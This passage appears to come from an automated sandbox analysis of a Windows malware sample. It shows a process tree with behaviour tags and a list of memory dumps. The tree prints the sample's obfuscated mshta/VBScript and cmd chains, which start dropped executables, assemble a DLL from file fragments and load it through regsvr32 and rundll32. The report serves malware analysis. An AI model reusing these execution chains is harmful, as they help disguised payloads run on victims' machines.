                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 664
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:3548
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 908
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 968
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:5548
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 1116
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:5672
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3968
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\41575.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\41575.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:5084
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\41575.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\41575.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1016
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
                                                                                                                                                                                                                                                                                                          LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                          PID:5320
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj "" == """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                            PID:5516
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj " == "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5792
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl" ). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 , TRUe ) )
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                              PID:5852
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:5544
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                      PID:6388
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:6644
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                        regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:7264
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                  taskkill /im "41575.exe" /f
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                  PID:5952
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              PID:6196
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                              PID:5012
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                              PID:6624
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:3900
                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:6720
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:8068
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:6312
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    PID:2780
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:8516
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                      PID:7228
                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding D87F2DBC0CEB9A7BD92E75F41B77BEBB C
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:7040
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 927C8C604BA362BEAF53A7756CF81774
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          PID:6532
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                            PID:6136
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 69B32C96D08DFAFB70153432295E976F E Global\MSI0000
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:3736
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          PID:6464
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                            PID:8196
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:204
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:7080
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  PID:8388
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:7324
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                  PID:8792
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:1836
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:5896
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:7464
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:8876
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:9184
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:8412
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:9208
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:4536
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                          PID:8996
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                          PID:7984
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                          PID:6600
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                          PID:7108

                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                        • memory/396-240-0x0000000006F70000-0x0000000006F71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-244-0x00000000079E0000-0x00000000079E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-201-0x0000000004510000-0x0000000004511000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-205-0x0000000004510000-0x0000000004511000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-255-0x0000000006D60000-0x0000000006D61000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-249-0x0000000007A80000-0x0000000007A81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-476-0x0000000006B63000-0x0000000006B64000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-219-0x0000000006A50000-0x0000000006A51000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-246-0x0000000007A10000-0x0000000007A11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-267-0x0000000008010000-0x0000000008011000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-230-0x0000000006B62000-0x0000000006B63000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/396-447-0x000000007E220000-0x000000007E221000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          Download

